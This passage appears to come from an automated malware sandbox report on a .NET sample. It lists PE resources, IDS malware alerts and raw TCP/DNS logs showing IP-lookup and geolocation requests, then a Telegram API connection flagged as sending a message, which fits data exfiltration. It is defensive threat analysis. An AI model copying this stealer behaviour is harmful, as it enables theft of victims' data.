                                                                                                            .rsrc0xbc0000x13ac80x13c001c52a2cb8e3deb1ba06c2049ad1979d1False0.4259913963607595data6.010546228059377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xd00000xc0x20026e5937dec86f8fb8460b87f50234a81False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0xbc6580x42b0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9922680412371134
                                                                                                            RT_ICON0xc09080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.4594882729211087
                                                                                                            RT_ICON0xc17b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.48826714801444043
                                                                                                            RT_ICON0xc20580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.478110599078341
                                                                                                            RT_ICON0xc27200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.37210982658959535
                                                                                                            RT_ICON0xc2c880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.24201244813278008
                                                                                                            RT_ICON0xc52300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.2924484052532833
                                                                                                            RT_ICON0xc62d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.3942622950819672
                                                                                                            RT_ICON0xc6c600x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.49379432624113473
                                                                                                            RT_ICON0xc70c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.33198924731182794
                                                                                                            RT_ICON0xc73b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.41216216216216217
                                                                                                            RT_ICON0xc74d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.42905405405405406
                                                                                                            RT_ICON0xc76000x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.2661290322580645
                                                                                                            RT_ICON0xc78e80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.18010752688172044
                                                                                                            RT_ICON0xc7bd00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.35135135135135137
                                                                                                            RT_ICON0xc7cf80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.06092057761732852
                                                                                                            RT_ICON0xc85a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.07658959537572255
                                                                                                            RT_ICON0xc8b080xca8Device independent bitmap graphic, 32 x 64 x 24, image size 30720.042901234567901236
                                                                                                            RT_ICON0xc97b00x368Device independent bitmap graphic, 16 x 32 x 24, image size 7680.10550458715596331
                                                                                                            RT_ICON0xc9b180x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6400709219858156
                                                                                                            RT_ICON0xc9f800x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.5
                                                                                                            RT_ICON0xca0a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.19060283687943264
                                                                                                            RT_ICON0xca5100x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.11429872495446267
                                                                                                            RT_ICON0xcb6380x2668Device independent bitmap graphic, 48 x 96 x 32, image size 97920.07211147274206672
                                                                                                            RT_ICON0xcdca00x1952PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.7099660598580685
                                                                                                            RT_GROUP_ICON0xcf5f40x3edata0.8709677419354839
                                                                                                            RT_GROUP_ICON0xcf6340x84data0.6893939393939394
                                                                                                            RT_GROUP_ICON0xcf6b80x22data1.0588235294117647
                                                                                                            RT_GROUP_ICON0xcf6dc0x22data1.0588235294117647
                                                                                                            RT_GROUP_ICON0xcf7000x5adata0.7666666666666667
                                                                                                            RT_GROUP_ICON0xcf75c0x22data1.1176470588235294
                                                                                                            RT_VERSION0xcf7800x348dataEnglishUnited States0.4154761904761905
                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain
                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-11T06:14:34.400712+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049980158.101.44.24280TCP
                                                                                                            2025-01-11T06:14:35.291474+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049980158.101.44.24280TCP
                                                                                                            2025-01-11T06:14:35.817329+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049982104.21.112.1443TCP
                                                                                                            2025-01-11T06:14:36.463329+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049983158.101.44.24280TCP
                                                                                                            2025-01-11T06:14:38.214770+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049986104.21.112.1443TCP
                                                                                                            2025-01-11T06:14:40.599478+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049990104.21.112.1443TCP
                                                                                                            2025-01-11T06:14:41.832235+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049992104.21.112.1443TCP
                                                                                                            2025-01-11T06:14:44.289038+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049996104.21.112.1443TCP
                                                                                                            2025-01-11T06:14:45.212528+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.1049997149.154.167.220443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 11, 2025 06:14:33.602204084 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:33.607120037 CET8049980158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:33.607213974 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:33.607675076 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:33.612521887 CET8049980158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.185796976 CET8049980158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.190495014 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:34.195360899 CET8049980158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.345936060 CET8049980158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.399957895 CET49981443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:34.399997950 CET44349981104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.400084972 CET49981443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:34.400712013 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:34.405935049 CET49981443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:34.405953884 CET44349981104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.890487909 CET44349981104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.891751051 CET49981443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:34.894030094 CET49981443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:34.894042969 CET44349981104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.894328117 CET44349981104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.942106962 CET49981443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:34.987335920 CET44349981104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.062614918 CET44349981104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.062691927 CET44349981104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.063117981 CET49981443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:35.070328951 CET49981443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:35.073086977 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:35.077908993 CET8049980158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.240240097 CET8049980158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.243752956 CET49982443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:35.243773937 CET44349982104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.244141102 CET49982443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:35.244141102 CET49982443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:35.244165897 CET44349982104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.291474104 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:35.706233978 CET44349982104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.708589077 CET49982443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:35.708612919 CET44349982104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.817337036 CET44349982104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.817416906 CET44349982104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.817493916 CET49982443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:35.817971945 CET49982443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:35.821588993 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:35.822902918 CET4998380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:35.826585054 CET8049980158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.827266932 CET4998080192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:35.827795029 CET8049983158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:35.827878952 CET4998380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:35.828012943 CET4998380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:35.832873106 CET8049983158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:36.409315109 CET8049983158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:36.411868095 CET49984443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:36.411911011 CET44349984104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:36.411990881 CET49984443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:36.412235022 CET49984443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:36.412250996 CET44349984104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:36.463329077 CET4998380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:36.871130943 CET44349984104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:36.873426914 CET49984443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:36.873450041 CET44349984104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:37.005429029 CET44349984104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:37.005496979 CET44349984104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:37.005578995 CET49984443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:37.006072998 CET49984443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:37.010715961 CET4998580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:37.015557051 CET8049985158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:37.015618086 CET4998580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:37.015734911 CET4998580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:37.020514011 CET8049985158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:37.588841915 CET8049985158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:37.600975037 CET49986443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:37.601016045 CET44349986104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:37.601097107 CET49986443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:37.601567984 CET49986443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:37.601587057 CET44349986104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:37.635092974 CET4998580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:38.075851917 CET44349986104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.078191042 CET49986443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:38.078212023 CET44349986104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.214803934 CET44349986104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.214898109 CET44349986104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.214941978 CET49986443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:38.215363026 CET49986443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:38.219417095 CET4998580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:38.220593929 CET4998780192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:38.224349976 CET8049985158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.224390984 CET4998580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:38.225343943 CET8049987158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.225403070 CET4998780192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:38.225517035 CET4998780192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:38.230246067 CET8049987158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.793045998 CET8049987158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.794372082 CET49988443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:38.794414043 CET44349988104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.794539928 CET49988443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:38.794837952 CET49988443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:38.794852018 CET44349988104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:38.838222027 CET4998780192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:39.245210886 CET44349988104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.247185946 CET49988443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:39.247212887 CET44349988104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.376936913 CET44349988104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.377007008 CET44349988104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.377285004 CET49988443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:39.377547026 CET49988443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:39.380752087 CET4998780192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:39.381932020 CET4998980192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:39.385745049 CET8049987158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.385807991 CET4998780192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:39.386804104 CET8049989158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.386879921 CET4998980192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:39.387006998 CET4998980192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:39.391896009 CET8049989158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.969633102 CET8049989158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.973017931 CET49990443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:39.973057032 CET44349990104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:39.973123074 CET49990443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:39.973464012 CET49990443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:39.973479986 CET44349990104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:40.025736094 CET4998980192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:40.446177959 CET44349990104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:40.448285103 CET49990443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:40.448314905 CET44349990104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:40.599493980 CET44349990104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:40.599556923 CET44349990104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:40.599659920 CET49990443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:40.600261927 CET49990443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:40.603843927 CET4998980192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:40.605310917 CET4999180192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:40.608762026 CET8049989158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:40.608831882 CET4998980192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:40.610126972 CET8049991158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:40.610188007 CET4999180192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:40.610260010 CET4999180192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:40.615077972 CET8049991158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.184684038 CET8049991158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.204015970 CET49992443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:41.204056978 CET44349992104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.204125881 CET49992443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:41.207900047 CET49992443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:41.207920074 CET44349992104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.228863955 CET4999180192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:41.684026003 CET44349992104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.686014891 CET49992443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:41.686053991 CET44349992104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.832226992 CET44349992104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.832285881 CET44349992104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.832395077 CET49992443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:41.832901001 CET49992443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:41.836261988 CET4999180192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:41.837404013 CET4999380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:41.841331005 CET8049991158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.841412067 CET4999180192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:41.842238903 CET8049993158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:41.842299938 CET4999380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:41.842418909 CET4999380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:41.847192049 CET8049993158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:42.434077978 CET8049993158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:42.435597897 CET49994443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:42.435663939 CET44349994104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:42.435762882 CET49994443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:42.436063051 CET49994443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:42.436079979 CET44349994104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:42.478954077 CET4999380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:42.893491030 CET44349994104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:42.895347118 CET49994443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:42.895410061 CET44349994104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.037095070 CET44349994104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.037154913 CET44349994104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.037323952 CET49994443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:43.037826061 CET49994443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:43.040800095 CET4999380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:43.042597055 CET4999580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:43.045787096 CET8049993158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.047569036 CET8049995158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.047653913 CET4999380192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:43.047653913 CET4999580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:43.047889948 CET4999580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:43.052717924 CET8049995158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.666960955 CET8049995158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.669158936 CET49996443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:43.669184923 CET44349996104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.669341087 CET49996443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:43.669809103 CET49996443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:43.669823885 CET44349996104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:43.713259935 CET4999580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:44.141762972 CET44349996104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.149734974 CET49996443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:44.149751902 CET44349996104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.289055109 CET44349996104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.289144039 CET44349996104.21.112.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.289207935 CET49996443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:44.289798021 CET49996443192.168.2.10104.21.112.1
                                                                                                            Jan 11, 2025 06:14:44.303029060 CET4999580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:44.308310032 CET8049995158.101.44.242192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.308387995 CET4999580192.168.2.10158.101.44.242
                                                                                                            Jan 11, 2025 06:14:44.311249018 CET49997443192.168.2.10149.154.167.220
                                                                                                            Jan 11, 2025 06:14:44.311290026 CET44349997149.154.167.220192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.311355114 CET49997443192.168.2.10149.154.167.220
                                                                                                            Jan 11, 2025 06:14:44.311784983 CET49997443192.168.2.10149.154.167.220
                                                                                                            Jan 11, 2025 06:14:44.311799049 CET44349997149.154.167.220192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.943058014 CET44349997149.154.167.220192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.943183899 CET49997443192.168.2.10149.154.167.220
                                                                                                            Jan 11, 2025 06:14:44.945071936 CET49997443192.168.2.10149.154.167.220
                                                                                                            Jan 11, 2025 06:14:44.945086002 CET44349997149.154.167.220192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.945359945 CET44349997149.154.167.220192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.947168112 CET49997443192.168.2.10149.154.167.220
                                                                                                            Jan 11, 2025 06:14:44.987344027 CET44349997149.154.167.220192.168.2.10
                                                                                                            Jan 11, 2025 06:14:45.212538958 CET44349997149.154.167.220192.168.2.10
                                                                                                            Jan 11, 2025 06:14:45.212620020 CET44349997149.154.167.220192.168.2.10
                                                                                                            Jan 11, 2025 06:14:45.212671995 CET49997443192.168.2.10149.154.167.220
                                                                                                            Jan 11, 2025 06:14:45.217046022 CET49997443192.168.2.10149.154.167.220
                                                                                                            Jan 11, 2025 06:14:59.732825041 CET4998380192.168.2.10158.101.44.242
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 11, 2025 06:14:33.588252068 CET5673753192.168.2.101.1.1.1
                                                                                                            Jan 11, 2025 06:14:33.595033884 CET53567371.1.1.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:34.388488054 CET4991953192.168.2.101.1.1.1
                                                                                                            Jan 11, 2025 06:14:34.399250031 CET53499191.1.1.1192.168.2.10
                                                                                                            Jan 11, 2025 06:14:44.303689003 CET5081153192.168.2.101.1.1.1
                                                                                                            Jan 11, 2025 06:14:44.310415983 CET53508111.1.1.1192.168.2.10
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 11, 2025 06:14:33.588252068 CET192.168.2.101.1.1.10x8aeeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:34.388488054 CET192.168.2.101.1.1.10x269Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:44.303689003 CET192.168.2.101.1.1.10xf68cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 11, 2025 06:14:33.595033884 CET1.1.1.1192.168.2.100x8aeeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:33.595033884 CET1.1.1.1192.168.2.100x8aeeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:33.595033884 CET1.1.1.1192.168.2.100x8aeeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:33.595033884 CET1.1.1.1192.168.2.100x8aeeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:33.595033884 CET1.1.1.1192.168.2.100x8aeeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:33.595033884 CET1.1.1.1192.168.2.100x8aeeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:34.399250031 CET1.1.1.1192.168.2.100x269No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:34.399250031 CET1.1.1.1192.168.2.100x269No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:34.399250031 CET1.1.1.1192.168.2.100x269No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:34.399250031 CET1.1.1.1192.168.2.100x269No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:34.399250031 CET1.1.1.1192.168.2.100x269No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:34.399250031 CET1.1.1.1192.168.2.100x269No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:34.399250031 CET1.1.1.1192.168.2.100x269No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:14:44.310415983 CET1.1.1.1192.168.2.100xf68cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.1049980158.101.44.242808132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:14:33.607675076 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
